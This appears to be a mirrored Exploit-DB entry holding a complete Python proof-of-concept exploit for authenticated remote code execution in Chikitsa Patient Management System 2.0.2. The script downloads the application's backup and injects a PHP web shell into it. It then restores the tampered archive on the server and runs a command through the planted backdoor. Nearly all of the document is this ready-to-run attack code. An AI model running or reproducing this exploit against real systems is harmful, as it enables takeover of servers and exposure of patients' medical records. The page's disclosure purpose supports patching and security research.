Chikitsa Patient Management System 2.0.2 – ‘backup’ Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 13 阅读

• 作者： 0z09e
  日期： 2021-12-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50572/

• # Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
  # Date: 03/12/2021
  # Exploit Author: 0z09e (https://twitter.com/0z09e)
  # Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
  # Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
  # Version: 2.0.2
  # Tested on: Ubuntu
  
  import requests
  import os
  from zipfile import ZipFile
  import argparse
  
  
  
  
  def login(session , target , username , password):
  	print("[+] Attempting to login with the credential")
  	url = target + "/index.php/login/valid_signin"
  	login_data = {"username" : username , "password" : password}
  	session.post(url , data=login_data , verify=False)
  	return session
  
  
  def download_backup( session , target):
  	print("[+] Downloading the backup (This may take some time)")
  	url = target + "/index.php/settings/take_backup/"
  	backup_req = session.get(url , verify=False)
  	global tmp_dir
  	tmp_dir = os.popen("mktemp -d").read().rstrip()
  	open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)
  	print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")
  
  
  def modify_backup():
  	print("[+] Modifying the backup by injecting a backdoor.")
  	zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
  	zf.extractall(tmp_dir)
  	zf.close()
  	open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
  	os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()
  
  
  def upload_backup(session , target):
  	print("[+] Uploading the backup back into the server.(This may take some time)")
  	url = target + "/index.php/settings/restore_backup"
  	file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()
  	session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})
  	print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
  	print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")
  
  
  
  
  def main():
  	parser = argparse.ArgumentParser("""
  		___ __ _ __
  _____/ /_(_) /__(_) /__________ _
   / ___/ __ \/ / //_/ / __/ ___/ __ `/
  / /__/ / / / / ,< / / /_(__) /_/ / 
  \___/_/ /_/_/_/|_/_/\__/____/\__,_/
   
  Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution : 
  POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
  	req_args = parser.add_argument_group('required arguments')
  	req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
  	req_args.add_argument("-u" , "--username" , help="Username" , required=True)
  	req_args.add_argument("-p" , "--password" , help="password", required=True)
  	args = parser.parse_args()
  
  	target = args.URL
  	if target[-1] == "/":
  		target = target[:-1]
  	username = args.username
  	password = args.password
  
  	session = requests.session()
  	login(session ,target , username , password)
  	download_backup(session , target )
  	modify_backup()
  	upload_backup(session , target)
  
  
  if __name__ == "__main__":
  	main()